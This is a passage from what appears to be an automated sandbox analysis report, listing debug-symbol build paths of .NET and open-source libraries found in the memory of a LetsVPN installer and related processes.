              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: letsvpn-latest.exe, 00000013.00000003.2505104084.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: letsvpn-latest.exe, 00000013.00000003.2351921276.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3935799668.000000002F832000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dlls, source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2381616746.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374330113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377335396.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377822909.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2381114597.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2378990816.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379744971.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2385038113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2383638970.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2382636946.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2380459987.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2470389956.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: letsvpn-latest.exe, 00000013.00000003.2358108445.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.Cci.Pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: letsvpn-latest.exe, 00000013.00000003.2482513419.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: letsvpn-latest.exe, 00000013.00000003.2426656105.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2445404154.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: letsvpn-latest.exe, 00000013.00000003.2492831621.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2360771712.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: letsvpn-latest.exe, 00000013.00000003.2376617919.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: letsvpn-latest.exe, 00000013.00000003.2325389222.000000000283E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000035.00000002.2771963199.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000035.00000000.2754233915.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000037.00000002.2836954621.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000037.00000000.2823850009.000000000086D000.00000002.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: letsvpn-latest.exe, 00000013.00000003.2413049289.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: letsvpn-latest.exe, 00000013.00000003.2425444699.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: letsvpn-latest.exe, 00000013.00000003.2485799565.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: letsvpn-latest.exe, 00000013.00000003.2362731884.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2348840467.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776724379.0000000005842000.00000002.00000001.01000000.0000001C.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: letsvpn-latest.exe, 00000013.00000003.2466181205.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: letsvpn-latest.exe, 00000013.00000003.2503453732.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: letsvpn-latest.exe, 00000013.00000003.2418462698.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2442323739.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: letsvpn-latest.exe, 00000013.00000003.2436479526.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: letsvpn-latest.exe, 00000013.00000003.2469273215.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: letsvpn-latest.exe, 00000013.00000003.2381721740.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2394827139.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: letsvpn-latest.exe, 00000013.00000003.2383731148.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2454973040.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2463667544.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcr120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: letsvpn-latest.exe, 00000013.00000003.2476153727.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3901746176.000000006C641000.00000020.00000001.01000000.0000000C.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: letsvpn-latest.exe, 00000013.00000003.2414306472.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: letsvpn-latest.exe, 00000013.00000003.2466635348.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: letsvpn-latest.exe, 00000013.00000003.2456991625.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2451342015.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2484351644.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: letsvpn-latest.exe, 00000013.00000003.2443629521.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000013.00000003.2324359693.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2472307011.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000013.00000003.2476800836.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2452142789.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000013.00000003.2412446400.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000013.00000003.2424061182.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2501368760.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000013.00000003.2473661260.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2435858420.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000013.00000003.2470389956.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000013.00000003.2359617621.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000013.00000003.2328342525.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000013.00000003.2388837865.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2471020373.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000013.00000003.2351921276.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3935799668.000000002F832000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2486397887.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2388106062.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000013.00000003.2411045465.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000013.00000003.2506430141.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000013.00000003.2469739574.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: letsvpn-latest.exe, 00000013.00000003.2387260703.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000013.00000003.2437133707.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2502768386.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000013.00000003.2489862982.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2360771712.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000013.00000003.2467995068.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000013.00000003.2484002109.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000013.00000003.2406644681.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2377902690.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000013.00000003.2497867835.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2422053301.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000013.00000003.2351037678.0000000002838000.00000004.00000020.00020000.00000000.sdmp
